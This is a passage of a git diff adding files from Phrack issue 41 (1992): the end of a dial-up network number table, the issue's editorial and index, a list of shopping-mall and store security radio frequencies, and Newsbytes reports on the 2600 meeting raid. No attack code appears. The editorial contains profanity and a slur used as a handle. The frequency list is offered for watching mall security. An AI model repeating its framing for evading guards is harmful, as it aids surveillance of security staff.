+2839  Lynchburg            VA  USA  LOW   B B  C         804      Y
+4975  Manassas             VA  USA  LOW   B B  C         703      Y
+413   Midlothian/Richmond  VA  USA  MED   B B  C         804      Y
+413   Midlothian/Richmond  VA  USA  MED   B B  C         804      Y
+8459  Newport News         VA  USA  MED   B B  C         804      Y
+6986  Norfolk              VA  USA  MED   B B  C         804      Y
+14706 Petersburg           VA  USA  LOW   B B  C         804      Y
+6986  Portsmouth/Norfolk   VA  USA  MED   B B  C         804      Y
+6986  Portsmouth/Norfolk   VA  USA  MED   B B  C         804      Y
+413   Richmond             VA  USA  MED   B B  C         804      Y
+413   Richmond             VA  USA  MED   B B  C         804      Y
+4026  Roanoke              VA  USA  LOW   B B  C         703      Y
+6986  Virginia Bch/Norfolk VA  USA  MED   B B  C         804      Y
+6986  Virginia Bch/Norfolk VA  USA  MED   B B  C         804      Y
+4557  Williamsburg         VA  USA  LOW   B B  C         804      Y
+3435  Burlington           VT  USA  LOW   B B  C         802      Y
+1827  Auburn               WA  USA  LOW   B B  C         206      Y
+9170  Bellevue/Seattle     WA  USA  HIGH  B B  C         206      Y
+9170  Bellevue/Seattle     WA  USA  HIGH  B B  C         206      Y
+9170  Bellevue/Seattle     WA  USA  HIGH  B B  C         206      Y
+8373  Bellingham           WA  USA  LOW   B B  C         206      Y
+773   Bremerton            WA  USA  LOW   B B  C         206      Y
+1827  Enumclaw/Auburn      WA  USA  LOW   B B  C         206      Y
+5133  Everett              WA  USA  LOW   B B  C         206      Y
+2944  Longview             WA  USA  LOW   B B  C         206      Y
+2508  Olympia              WA  USA  LOW   B B  C         206      Y
+6113  Port Angeles         WA  USA  LOW   B B  C         206      Y
+5298  Pullman              WA  USA  LOW   B B  C         509      Y
+2116  Richland             WA  USA  MED   B B  C         509      Y
+2116  Richland             WA  USA  MED   B B  C         509      Y
+9170  Seattle              WA  USA  HIGH  B B  C         206      Y
+9170  Seattle              WA  USA  HIGH  B B  C         206      Y
+9170  Seattle              WA  USA  HIGH  B B  C         206      Y
+159   Spokane              WA  USA  MED   B B  C         509      Y
+906   Tacoma               WA  USA  LOW   B B  C         206      Y
+5447  Vancouver            WA  USA  LOW   B B  C         206      Y
+8931  Yakima               WA  USA  LOW   B B  C         509      Y
+8868  Appleton             WI  USA  LOW   B B  C         414      Y
+5314  Beloit               WI  USA  LOW   B B  C         608      Y
+9167  Brookfield           WI  USA  HIGH  B B  C         414      Y
+9786  Eau Claire           WI  USA  LOW   B B  C         715      Y
+3421  Green Bay            WI  USA  LOW   B B  C         414      Y
+5314  Janesville/Beloit    WI  USA  LOW   B B  C         608      Y
+6966  Kenosha              WI  USA  LOW   B B  C         414      Y
+4633  La Crosse            WI  USA  LOW   B B  C         608      Y
+2635  Madison              WI  USA  LOW   B B  C         608      Y
+9167  Milwaukee/Brookfield WI  USA  HIGH  B B  C         414      Y
+5966  Oshkosh              WI  USA  LOW   B B  C         414      Y
+6966  Racine/Kenosha       WI  USA  LOW   B B  C         414      Y
+1792  Sheboygan            WI  USA  LOW   B B  C         414      Y
+5144  Wausau               WI  USA  LOW   B B  C         715      Y
+5465  West Bend            WI  USA  LOW   B B  C         414      Y
+3431  Charleston           WV  USA  LOW   B B  C         304      Y
+6594  Huntington           WV  USA  LOW   B B  C         304      Y
+890   Morgantown           WV  USA  LOW   B B  C         304      Y
+12924 Parkersburg          WV  USA  LOW   B B  C         304      Y
+890   Westover/Morgantown  WV  USA  LOW   B B  C         304      Y
+6681  Wheeling             WV  USA  LOW   B B  C         304      Y
+10537 Casper               WY  USA  LOW   B B  C         307      Y
+4213  Cheyenne             WY  USA  LOW   B B  C         307      Y
+1752  Laramie              WY  USA  LOW   B B  C         307      Y
+
+B=BELL 103/113 (300 bps) or BELL 212A (1200 bps) compatable modems.
+
+C=CCITT V.21(300 bps) or CCITT V.22 bis(2400 bps) or CCITT V.32 compatible
+  modems.
diff --git a/phrack41/1.txt b/phrack41/1.txt
new file mode 100644
index 0000000..215a54d
--- /dev/null
+++ b/phrack41/1.txt
@@ -0,0 +1,131 @@
+                                ==Phrack Inc.==
+
+                   Volume Four, Issue Forty-One, File 1 of 13
+
+                                 Issue 41 Index
+                              ___________________
+
+                               P H R A C K   4 1
+
+                               December 31, 1992
+                              ___________________
+
+                   ~ We've Had A Rest, We're Still The Best ~
+
+You've been waiting for this for a while and it's finally here.  A lot has
+happened since the last issue.  I guess I should start off with the most
+important thing as far as the administration of Phrack is concerned:  Phrack 41
+is the last issue for which I will serve as editor.
+
+Why?  Well for one, I was in a motorcycle wreck about a month ago and lost the
+use of my right arm for a while and, due to the related financial difficulties,
+I was forced to sell my computers and some other stuff.
+
+Secondly, due to my lack of being a rich boy and having access to a nice
+machine, I found it necessary to allow others to help me in putting out the
+past several issues and that has resulted in some things being released that I
+really wasn't happy with.
+
+However, don't get me wrong.  I'm not gonna sit here and dis my friends just
+because we differ in opinion about some things.  I think that the overall
+quality of the issues has been pretty good and anyone who says it's not can
+basically suck my dick, because I don't give a fuck about your opinion anyway.
+
+Thirdly, and the most important reason why I am resigning as editor of Phrack,
+is a general lack of desire on my part.  I mean the whole reason I even got
+involved with doing this was because of hacking -- partly for curiosity and
+partly for being able to thumb my nose at the powers that be and other
+intellectual types that say, "You can't do/learn about that because we don't
+think blah blah blah."  Like I'm supposed to give a fuck what anyone else
+thinks.  The type of public service that I think hackers provide is not showing
+security holes to whomever has denied their existence, but to merely embarrass
+the hell out of those so-called computer security experts and other purveyors
+of snake oil.  This is a service that is truly unappreciated and is what keeps
+me motivated.  ANYWAY...if you wanna hear me rant some more, maybe I'll get to
+do my own Eleeeeet3 Pro-Phile in the future.  Heh!
+
+But really, since my acquisition of Phrack, my play time has been hampered and
+consequently, I have started to become bored with it.  It was great to meet a
+lot of cool people and I learned some things.  It's now time for me to go back
+to doing what I like best.  For anyone who's interested in corresponding, I'm
+focusing my time on radio communications, HAM radio, scanning, and cellular
+telephones.  If you are interested in talking about these things to me or
+whatever, feel free to write me at dispater@stormking.com.
+
+Aside from all that, I feel that Phrack can be better.  That's why issue 42
+will have a new editor and administrative staff.  I'm not saying who, but you
+may be surprised.  NO, it's not KL or TK either.
+
+And with that, I'm saying adios and, as Adam Grant said, "Don't get caught."
+
+Now onto the issue:
+
+In this issue's Loopback, Phrack responds to the numerous letters it has
+received over the past several months, including the return of Shit Kickin' Jim
+and a message from Rop, editor of Hack-Tic.
+
+The Racketeer (Rack of The Hellfire Club) continues his Network Miscellany
+column with plenty of new information about fake mail.
+
+Phrack Pro-Phile focuses on one of the hacking community's most mysterious
+figures:  Supernigger.  SN was somewhat involved with the infamous DPAK and has
+some words of wisdom to the eleets and other folks who enjoy boasting about
+their number of years in "the hacker scene."
+
+                            DISPATER, Phrack Editor
+
+
+
+      Editor-In-Chief : Dispater
+       Eleet Founders : Taran King and Knight Lightning
+ Technical Consultant : Mind Mage
+   Network Miscellany : The Racketeer [HFC]
+                 News : Datastream Cowboy
+              Make-up : Hair Club for Men
+          Photography : Restricted Data Transmissions
+            Publicity : AT&T, BellSouth, and the United States Secret Service
+    Creative Stimulus : Camel Cool, Jolt Cola, and Taco Bell
+        Other Helpers : Scott Simpson, Zibby, The Weazel, The Fed, El1teZ
+                        Everywhere.
+
+
+  "For the record, we're hackers who believe information should be free.  All
+   information.  The world is full of phunky electronic gadgets and networks
+        and we want to share our information with the hacker community."
+                        -- Restricted Data Transmissions
+
+
+                "They are satisfying their own appetite to know
+                     something that is not theirs to know."
+                 -- Assistant District Attorney, Don Ingraham
+
+
+       "The notion that how things work is a big secret is simply wrong."
+                   -- Hacking/Cracking conference on The WELL
+
+
+
+                                -= Phrack 41 =-
+
+ Table Of Contents
+ ~~~~~~~~~~~~~~~~~
+ 1. Introduction by Dispater                                               07K
+ 2. Phrack Loopback by Dispater and Mind Mage                              52K
+ 3. Phrack Pro-Phile on Supernigger                                        10K
+ 4. Network Miscellany by The Racketeer [HFC]                              35K
+ 5. Pirates Cove by Rambone                                                32K
+ 6  Hacking AT&T System 75 by Scott Simpson                                20K
+ 7. How To Build a DMS-10 Switch by The Cavalier                           23K
+ 8. TTY Spoofing by VaxBuster                                              20K
+ 9. Security Shortcomings of AppleShare Networks by Bobby Zero             16K
+10. Mall Cop Frequencies by Caligula XXI                                   11K
+11. PWN/Part 1 by Datastream Cowboy                                        46K
+12. PWN/Part 2 by Datastream Cowboy                                        49K
+13. PWN/Part 3 by Datastream Cowboy                                        43K
+                                                                   Total: 364K
+
+                              There is no America.
+                             There is no democracy.
+                      There is only IBM and ITT and AT&T.
+                                -- Consolidated
+_______________________________________________________________________________
diff --git a/phrack41/10.txt b/phrack41/10.txt
new file mode 100644
index 0000000..a1ebde6
--- /dev/null
+++ b/phrack41/10.txt
@@ -0,0 +1,182 @@
+                                ==Phrack Inc.==
+
+                  Volume Four, Issue Forty-One, File 10 of 13
+
+          |                                                       |
+      _o  #                   Mall Cop Frequencies                #  o_
+     /()\/~                                                       ~\/()\
+     ~\\                        by Caligula XXI                      //~
+      ||                                                             ||
+      ~~                                                             ~~
+
+                  THIS ONE IS DEDICATED TO THE DC 2600 MEETING
+
+Living in America, one can easily and falsely assume that there really is a
+Bill of Rights.  On November 6, 1992, the right to peaceably gather was
+suspended.  Even though the U.S. Supreme Court ruled that shopping malls are
+"public meeting places" and not private property, it doesn't make a damn bit of
+difference to pigs.  So here is a little information that may help you keep an
+eye on them while they are so preoccupied with us.
+
+If your shopping mall is not listed below, try scanning (MHz):
+
+                 151.625 to 151.955          154.515 to 154.60
+                 457.5125 to 457.6125        460.65 to 462.1875
+                 462.75 to 462.775           463.20 to 464.9875
+                 465.65 to 467.1875          467.75 to 467.925
+                 468.20 to 469.975           851.0125 to 865.9875
+
+Following the shopping mall list is a list of nationwide stores and their
+security frequencies.
+
+ __________________________________________________________
+/ ST   City               Mall                   Freq. MHz \
+|==========================================================|
+| AK | Anchorage        | Northway Mall         | 461.775  |
+| AL | Birmingham       | Century Plaza         | 464.875  |
+| AL | Mobile           | Belair Mall           | 464.875  |
+| AL | Montgomery       | Montgomery Mall       | 466.0625 |
+| AZ | Phoenix          | Metrocenter           | 464.475  |
+| AZ | Phoenix          | Paradise Valley Mall  | 464.375  |
+| AZ | Tucson           | Foothills Mall        | 464.575  |
+| CA | Bakersfield      | Valley Plaza Shop Cent| 154.57   |
+| CA | Canoga Park      | Topanga Plaza         | 154.54   |
+| CA | Los Angeles      | Century City Center   | 461.025  |
+| CA | Oxnard           | Center Points Mall    | 464.475  |
+| CA | San Francisco    | Embarcardero Center   | 854.8375 |
+| CO | Boulder          | Crossroads Mall       | 468.7875 |
+| CO | Denver           | Laksie Mall           | 464.375  |
+| CT | Hartford         | Northeast Plaza       | 464.375  |
+|    |                  |                       | 464.675  |
+|    |                  |                       | 464.80   |
+|    |                  |                       | 464.95   |
+| CT | Danbury          | Fair Mall             | 464.675  |
+| DC | Washington       | Montgomery Mall       | 463.25   |
+| DC | Washington       | Renaissance Plaza     | 463.375  |
+| FL | Jacksonville     | Gateway Mall          | 461.025  |
+| FL | Miami            | South Date Plaza      | 461.675  |
+| FL | Ft. Charlotte    | South Port Square     | 154.54   |
+| FL | Tallahassee      | Tallahassee Mall      | 461.20   |
+|    |                  |                       | 463.60   |
+| FL | Tampa            | W. Shore Plaza        | 461.9125 |
+| GA | Atlanta          | Piedmont Center       | 464.525  |
+|    |                  |                       | 464.5875 |
+| GA | Atlanta          | Peachtree Center      | 461.825  |
+| HI | Pearl City       | Century Park Plaza    | 464.225  |
+| IA | Des Moines       | Merel Hay Mall        | 154.54   |
+|    |                  |                       | 154.57   |
+| IA | West Burlington  | Southridge Mall       | 464.675  |
+| IL | Springfield      | The Center            | 464.925  |
+| IL | Chicago          | Ford City Center      | 464.775  |
+|    |                  |                       | 464.975  |
+| IL | Aurora           | Fox Valley Center     | 464.675  |
+| IN | Ft. Wayne        | Glenbrook Square      | 464.575  |
+|    |                  |                       | 464.875  |
+| IN | Indianapolis     | Lafayette Square      | 461.025  |
+| KS | Manhattan        | Manhattan Tower Center| 463.525  |
+| KS | Kansas City      | Bannister Mall        | 464.575  |
+|    |                  |                       | 464.675  |
+| KY | Lexington        | Fayette Mall          | 462.1125 |
+| KY | Louisville       | Oxmoor Center         | 464.8125 |
+| LA | New Orleans      | World Trade Center    | 463.25   |
+| LA | Shreveport       | Mall St. Vincent      | 464.675  |
+| MA | North Attleboro  | Emerald Square Mall   | 461.725  |
+| MA | Boston           | World Trade Center    | 461.9125 |
+|    |                  |                       | 461.9375 |
+|    |                  |                       | 461.9625 |
+|    |                  |                       | 462.1625 |
+|    |                  |                       | 464.80   |
+| MA | Boston           | Copley Plaza          | 154.60   |
+| MA | Watertown        | Arsenal Mall          | 464.95   |
+| MD | Baltimore        | Eastpoint Mall        | 151.805  |
+| MD | Greenbelt        | Beltway Plaza Mall    | 151.925  |
+| MI | Ann Arbor        | Briarwood Mall        | 462.05   |
+|    |                  |                       | 462.575  |
+| MI | Detroit          | Renaissance Center    | 151.955  |
+|    |                  |                       | 462.60   |
+|    |                  |                       | 462.7625 |
+| MI | Grand Rapids     | Woodland Center       | 464.475  |
+|    |                  |                       | 464.5375 |
+| MN | Rochester        | Center Place          | 464.475  |
+|    |                  |                       | 464.5375 |
+| MO | Kansas City      | Banister Mall         | 464.575  |
+|    |                  |                       | 464.675  |
+| MO | St. Louis        | Galleria              | 461.9125 |
+|    |                  |                       | 462.0875 |
+|    |                  |                       | 462.8625 |
+| MS | Tupelo           | Mall @ Barnes Cross   | 464.60   |
+| MT | Billings         | West Park Plaza       | 464.775  |
+| NC | Raleigh          | North Hills Mall      | 464.575  |
+| NC | Wilmington       | Independence Mall     | 464.7875 |
+| ND | Great Forks      | Columbia Mall         | 463.60   |
+| NE | Freendale        | Southridge Mall       | 464.525  |
+| NE | North Platte     | The Mall              | 461.425  |
+| NH | Newington        | Foxrun Mall           | 463.975  |
+|    |                  |                       | 464.225  |
+| NH | Nashua           | Pheasant Lane Mall    | 464.95   |
+| NJ | Atlantic City    | Ocean One Mall        | 461.90   |
+| NJ | Short Hills      | Mall @ Short Hills    | 464.825  |
+| NJ | New Brunswick    | Fashion Plaza         | 464.475  |
+| NV | Reno             | Park Lane Mall        | 464.05   |
+| NY | Colonie          | Northway Mall         | 461.6875 |
+| NY | Mineola          | Roosevelt Field       | 462.725  |
+| NY | Massapequa       | Sunrise Mall          | 151.865  |
+|    |                  |                       | 464.465  |
+| NY | Mt. Vernon       | Cross Country Center  | 154.57   |
+|    |                  |                       | 154.60   |
+| NY | New York         | Gateway Plaza         | 464.825  |
+| NY | Lake Grove       | Smithaven Mall        | 154.60   |
+| OH | Columbus         | Northland Mall        | 463.625  |
+|    |                  |                       | 464.925  |
+| OH | Cleveland        | Randall Park          | 461.425  |
+| OH | Youngstown       | Southern Park Mall    | 461.50   |
+| OK | Broken Arrow     | Woodland Hills Mall   | 461.075  |
+|    |                  |                       | 469.675  |
+| OK | Oklahoma City    | North Park Mall       | 464.7875 |
+| OR | Eugene           | Gateway Mall          | 461.125  |
+| OR | Portland         | Washington Square Mall| 464.475  |
+| PA | Media            | Granite Run Mall      | 464.325  |
+| PA | Pittsburgh       | Century III           | 464.325  |
+|    |                  |                       | 464.375  |
+|    |                  |                       | 464.975  |
+| PA | Pittsburgh       | Parkway Center Mall   | 464.6875 |
+| RI | Newport          | Mall @ Newport        | 461.575  |
+| SC | Columbia         | Columbia Mall         | 462.1125 |
+| SC | Spartanburg      | Westgate Mall         | 151.955  |
+| TN | Knoxville        | East Town Mall        | 463.3375 |
+| TN | Memphis          | Mall of Memphis       | 464.975  |
+| TN | Nashville        | Bellevue Center       | 464.825  |
+| TX | San Antonio      | Wonderland Mall       | 467.875  |
+|    |                  |                       | 469.9125 |
+| TX | Dallas           | World Trade Center    | 464.375  |
+|    |                  |                       | 464.875  |
+| TX | Fort Worth       | Plaza Forth Worth     | 461.85   |
+|    |                  |                       | 464.55   |
+| TX | Houston          | West Oaks Mall        | 462.1125 |
+|    |                  |                       | 464.3875 |
+|    |                  |                       | 464.4875 |
+| UT | Salt Lake City   | Crossroads Plaza      | 464.825  |
+|    |                  |                       | 464.975  |
+|    |                  |                       | 464.9875 |
+| VA | Colonial Heights | Southpark Mall        | 855.5625 |
+| VA | Hampton          | Coliseum Mall         | 464.30   |
+| VA | Portsmouth       | Tower Mall            | 464.675  |
+| WI | Milwaukee        | Southgate Mall        | 464.725  |
+|    |                  |                       | 464.8875 |
+| WV | Vienna           | Grand Central Mall    | 151.835  |
+| WY | Cheyenne         | Frontier Mall         | 464.5125 |
+\__________________________________________________________/
+
+ __________________________________________________________
+/                |                                         \
+| J.C. Penny's   | 154.57, 154.60, 461.6125, 461.9375,     |
+|                | 464.50, 464.55                          |
+| K-Mart         | 154.57, 154.60, 457.5375, 457.5875,     |
+|                | 461.3125,463.9125                       |
+| Montgomery Ward| 467.8125                                |
+| Sears          | 154.57, 454.50, 464.55                  |
+| Toys R Us      | 461.7375, 461.9625, 463.7875, 464.9625  |
+| Wal-Mart       | 151.625, 467.7625, 467.75, 467.775      |
+|                | 467.80, 467.825, 467.85, 467.875, 467.90|
+| Zayre          | 461.0125, 463.4125                      |
+\________________|_________________________________________/
diff --git a/phrack41/11.txt b/phrack41/11.txt
new file mode 100644
index 0000000..b80843a
--- /dev/null
+++ b/phrack41/11.txt
@@ -0,0 +1,862 @@
+                                ==Phrack Inc.==
+
+                  Volume Four, Issue Forty-One, File 11 of 13
+
+              PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+              PWN                                             PWN
+              PWN              Phrack World News              PWN
+              PWN                                             PWN
+              PWN           Issue 41 / Part 1 of 3            PWN
+              PWN                                             PWN
+              PWN        Compiled by Datastream Cowboy        PWN
+              PWN                                             PWN
+              PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+
+
+ Reports of "Raid" on 2600 Washington Meeting                  November 9, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ by Barbara E. McMullen & John F. McMullen (Newsbytes)
+
+WASHINGTON, D.C. -- The publisher of a well-known hacker magazine claims a
+recent meeting attended by those interested in the issues his magazine raises
+was disrupted by threats of arrest by security and Arlington, Virginia police
+officers.
+
+Eric Corley, also known as "Emmanuel Goldstein," editor and publisher of "2600
+Magazine: The Hacker Quarterly," told Newsbytes that the meeting was held
+November 6th at the Pentagon City Mall outside Washington, DC was disrupted and
+material was confiscated in the raid.
+
+2600 Magazine promotes monthly meetings of hackers, press, and other interested
+parties throughout the country.  The meetings are held in public locations on
+the first Friday evening of the month and the groups often contact each other
+by telephone during the meetings.
+
+Corley told Newsbytes that meetings were held that evening in New York,
+Washington, Philadelphia, Cambridge, St. Louis, Chicago, Los Angeles and San
+Francisco.  Corley said, "While I am sure that meetings have been observed by
+law enforcement agencies, this is the only time that we have been harassed.  It
+is definitely a freedom of speech issue."
+
+According to Craig Neidorf, who was present at the meeting and was distributing
+applications for membership in Computer Professionals For Social Responsibility
+(CPSR), "I saw the security officers focusing on us.  Then they started to come
+toward us from a number of directions under what seemed to be the direction of
+a person with a walkie-talkie on a balcony.  When they approached, I left the
+group and observed the security personnel encircling the group of about 30
+gatherers.  The group was mainly composed of high school and college students.
+The guards demanded to search the knapsacks and bags of the gatherers.  They
+confiscated material, including CPSR applications, a copy of Mondo 2000 (a
+magazine), and other material."
+
+He adds that the guards also confiscated film "from a person trying to take
+pictures of the guards.  When a hacker called "HackRat" attempted to copy down
+the names of the guards, they took his pencil and paper."
+
+Neidorf continued, "I left to go outside and rejoined the group when they were
+ejected from the mall.  The guards continued challenging the group and told
+them that they would be arrested if they returned.  When one of the people
+began to take pictures of the guards, the apparent supervisor became excited
+and threatening but did not confiscate the film."
+
+Neidorf also said, "I think that the raid was planned.  They hit right about
+6:00 and they identified our group as "hackers" and said that they knew that
+this group met every month."
+
+Neidorf's story was supported by a Washington "hacker" called "Inhuman," who
+told Newsbytes, "I arrived at the meeting late and saw the group being detained
+by the guards.  I walked along with the group as they were being ushered out
+and when I asked a person who seemed to be in authority his name, he pointed at
+a badge with his name written in script on it.  I couldn't make out the name
+and, when I mentioned that to the person, he said 'If you can't read it, too
+bad.'  I did read his name, 'C. Thomas,' from another badge."
+
+Inhuman also told Newsbytes that he was told by a number of people that the
+guards said that they were "acting on behalf of the Secret Service."  He added,
+"I was also told that there were two police officers from the Arlington County
+Police present but I did not see them."
+
+Another attendee, Doug Luce, reports, "I also got to the DC meeting very late;
+7:45 or so.  It seemed like a coordinated harassment episode, not geared toward
+busting anyone, but designed to get people riled up, and maybe not come back to
+the mall."
+
+Luce adds that he overheard a conversation between someone who had brought a
+keyboard to sell.  The person, he said, was harassed by security forces, one of
+whom said, "You aren't selling anything in my mall without a vendors permit!"
+
+Possible Secret Service involvement was supported by a 19 year-old college
+student known as the "Lithium Bandit," who told Newsbytes, "I got to the mall
+about 6:15 and saw the group being detained by approximately 5 Arlington County
+police and 5 security guards. When I walked over to see what was going on, a
+security guard asked me for an ID and I refused to show it, saying that I was
+about to leave.  The guard said that I couldn't leave and told me that I had to
+see a police officer.  When I did, the officer demanded ID and, when I once
+again refused, he informed me that I could be detained for up to 10 hours for
+refusing to produce identification.  I gave in and produced my school ID which
+the police gave to the security people who copied down my name and social
+security number."
+
+Lithium Bandit continued, "When I asked the police what was behind this action,
+I was told that they couldn't answer but that 'the Secret Service is involved
+and we are within our rights doing this."
+
+The boy says he and others later went to the Arlington police station to get
+more information and were told only that there was a report of the use of a
+stolen credit card and two officers were sent to investigate.  "They later
+admitted that it was 5 (officers).  While I was detained, I heard no mention of
+a credit card and there was no one arrested."
+Marc Rotenberg, director of CPSR's Washington office, told Newsbytes, "I have
+really no details on the incident yet, but I am very concerned about the
+reports. Confiscation of CPSR applications, if true, is outrageous.  I will
+find out more facts on Monday."
+
+Newsbytes was told by the Pentagon City Mall office that any information
+concerning the action would have to come from the director of security, Al
+Johnson, who was not available until Monday.  The Arlington Country Police
+referred Newsbytes to a "press briefing recording" which had not been updated
+since the morning before the incident.
+
+Corley told Newsbytes, "There have been no reports of misbehavior by any of
+these people.  They were obviously singled out because they were hackers.  It's
+as if they were being singled out as an ethnic group.  I admire the way the
+group responded -- in a courteous fashion.  But it is inexcusable that it
+happened.  I will be at the next Washington meeting to insure that it doesn't
+happen again."
+
+The manager of one of New York state's largest malls provided background
+information to Newsbytes on the rights of malls to police those on mall
+property, saying, "The primary purpose of a mall is to sell. The interior of
+the mall is private property and is subject to the regulations of the mall.
+The only requirement is that the regulations be enforced in an even-handed
+manner.  I do not allow political activities in my mall so I could not make an
+exception for Democrats.  We do allow community groups to meet but they must
+request space at least two weeks before the meeting and must have proper
+insurance.  Our regulations also say that groups of more than 4 may not
+congregate in the mall."
+
+The spokeswoman added that mall security can ask for identification from those
+who violate regulations and that they may be barred from the mall for a period
+of 6 months.
+
+She added, "Some people feel that mall atriums and food courts are public
+space.  They are not and the industry is united on this.  If the malls were to
+receive tax benefits for the common space and public service in snow removal
+and the like, it could possibly be a public area but malls are taxed on the
+entire space and are totally private property, subject to their own
+regulations.  If a group of 20 or more congregated in my mall, they would be
+asked to leave."
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+ Confusion About Secret Service Role In 2600 Washington Raid   November 7, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ by Barbara E. McMullen & John F. McMullen (Newsbytes)
+
+WASHINGTON, D.C.-- In the aftermath of an action on Friday, November 6th by
+members of the Pentagon City Mall Police and police from Arlington County,
+Virginia in which those attending a 2600 meeting at the mall were ordered from
+the premises, conflicting stories continue to appear.
+
+Attendees at the meeting have contended to Newsbytes that members of the mall
+police told them that they were "acting on behalf of the Secret Service."  They
+also maintain that the mall police confiscated material from knapsacks and took
+film from someone attempting to photograph the action and a list of the names
+of security officers that one attendee was attempting to compile.
+
+Al Johnson, chief of security for the mall, denied these allegations to
+Newsbytes, saying "No one said that we were acting on behalf of the Secret
+Service.  We were merely enforcing our regulations.  While the group was not
+disruptive, it had pulled tables together and was having a meeting in our food
+court area.  The food court is for people eating and is not for meetings.  We
+therefore asked the people to leave."
+
+Johnson denied that security personnel took away any film or lists and further
+said "We did not confiscate any material.  The group refused to own up to who
+owned material on the tables and in the vicinity so we collected it as lost
+material.  If it turns out that anything did belong to any of those people,
+they are welcome to come in and, after making proper identification, take the
+material."
+
+In a conversation early on November 9th, Robert Rasor, Secret Service agent-in-
+charge of computer crime investigations, told Newsbytes that having mall
+security forces represent the Secret Service is not something that was done
+and, that to his knowledge, the Secret Service had no involvement with any
+Pentagon City mall actions on the previous Friday.
+
+A Newsbytes call to the Arlington County police was returned by a Detective
+Nuneville who said that her instructions were to refer all questions concerning
+the matter to agent David Adams of the Secret Service.  She told Newsbytes that
+Adams would be providing all information concerning the involvement of both the
+Arlington Police and the Secret Service in the incident.
+
+Adams told Newsbytes "The mall police were not acting as agents for the Secret
+Service. Beyond that, I can not confirm or deny that there is an ongoing
+investigation."
+
+Adams also told Newsbytes that "While I cannot speak for the Arlington police,
+I understand that their involvement was due to an incident unrelated to the
+investigation."
+
+Marc Rotenberg, director of the Washington office of Computer Professionals for
+Social Responsibility (CPSR), told Newsbytes "CPSR has reason to believe that
+the detention of people at the Pentagon City Mall last Friday was undertaken at
+the behest of the Secret Service, which is a federal agency.  If that is the
+case, then there was an illegal search of people at the mall.  There was no
+warrant and no indication of probable illegal activity.  This raises
+constitutional issues. We have undertaken the filing of a Freedom of
+Information Act (FOIA) request to determine the scope, involvement and purpose
+of the Secret Service in this action."
+
+2600 meetings are held on the evening of the first Friday of each month in
+public places and malls in New York City, Washington, Philadelphia, Cambridge,
+St. Louis, Chicago, Los Angeles and San Francisco.  They are promoted by 2600
+Magazine: The Hacker Quarterly and are attended by a variety of persons
+interested in telecommunications and so-called "hacker issues".  The New York
+meeting, the oldest of its kind, is regularly attended by Eric Corley a/k/a
+Emmanuel Goldstein, editor and publisher of 2600, hackers, journalists,
+corporate communications professionals and other interested parties.  It is
+known to have been the subject of surveillance at various times by law
+enforcement agencies conducting investigations into allegations of computer
+crime.
+
+Corley told Newsbytes "While I'm sure that meetings have been observed by law
+enforcement agencies, this is the only time that we have been harassed.  It's
+definitely a freedom of speech issue." Corley also that he plans to be at the
+December meeting in Washington "to insure that it doesn't happen again."
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+ Conflicting Stories In 2600 Raid; CRSR Files FOIA            November 11, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ by Barbara E. McMullen & John F. McMullen (Newsbytes)
+
+WASHINGTON, D.C. -- In the on-going investigation of possible Secret Service
+involvement in the Friday, November 6th ejection of attendees at a "2600
+meeting" from the premises of the Pentagon City Mall, diametrically opposed
+statements have come from the same source.
+
+Al Johnson, chief of security for the Pentagon City Mall told Newsbytes on
+Monday, November 9th "No one said that we were acting on behalf of the Secret
+Service.  We were merely enforcing our regulations.  While the group was not
+disruptive, it had pulled tables together and was having a meeting in our food
+court area.  The food court is for people eating and is not for meetings.  We
+therefore asked the people to leave."
+
+On the same day, Johnson was quoted was quoted in a Communications Daily
+article by Brock Meeks as saying "As far as I'm concerned, we're out of this.
+The Secret Service, the FBI, they're the ones that ramrodded this whole thing."
+
+Newsbytes contacted Meeks to discuss the discrepancies in the stories and were
+informed that the conversation with Johnson had been taped and was available
+for review.  The Newsbytes reporter listened to the tape (and reviewed a
+transcript).  On the tape, Johnson was clearly heard to make the statement
+quoted by Meeks.
+
+He also said "maybe you outta call the Secret Service, they're handling this
+whole thing.  We, we were just here", and, in response to a Meeks question
+about a Secret Service contact, "Ah.. you know, I don't have a contact person.
+These people were working on their own, undercover, we never got any names, but
+they definitely, we saw identification, they were here."
+
+Newsbytes contacted Johnson again on the morning of Wednesday, November 11 and
+asked him once again whether there was any Secret Service involvement in the
+action. Johnson said "No, I told you that they were not involved."  When it was
+mentioned that there was a story in Communications Daily, quoting him to the
+contrary, Johnson said "I never told Meeks that.  There was no Secret Service
+involvement"
+
+Informed of the possible existence of a tape quoting him to the contrary.
+Johnson said "Meeks taped me? He can't do that.  I'll show him that I'm not
+fooling around.  I'll have him arrested."
+
+Johnson also said "He asked me if the Secret Service was involved; I just told
+him that, if he thought they were, he should call them and ask them."
+
+Then Johnson again told Newsbytes that the incident was "just a mall problem.
+There were too many people congregating."
+
+[NOTE: Newsbytes stands by its accurate reporting of Johnson's statements.  It
+also affirms that the story by Meeks accurately reflects the material taped
+during his interview]
+
+In a related matter, Marc Rotenberg, director of the Washington office of
+Computer Professionals For Social Responsibility (CPSR) has announced that CPSR
+has filed a Freedom of Information Act (FOIA) request with the Secret Service
+asking for information concerning Secret Service involvement in the incident.
+
+Rotenberg told Newsbytes that the Secret Service has 10 days to respond to the
+request.  He also said that CPSR "is exploring other legal options in this
+matter."
+
+The Secret Service, in earlier conversations with Newsbytes, has denied that
+the mall security was working on its behalf.
+
+In the incident itself, a group attending the informal meeting was disbanded
+and, according to attendees, had property confiscated.  They also contend that
+security guards took film from someone photographing the confiscation as well
+as a list that someone was making of the guard's names.  In his November 9th
+conversation with Newsbytes, Johnson denied that security personnel took away
+any film or lists and further said "We did not confiscate any material.  The
+group refused to own up to who owned material on the tables and in the vicinity
+so we collected it as lost material.  If it turns out that anything did belong
+to any of those people, they are welcome to come in and, after making proper
+identification, take the material."
+
+2600 meetings are promoted by 2600 Magazine: The Hacker Quarterly and are held
+on the evening of the first Friday of each month in public places and malls in
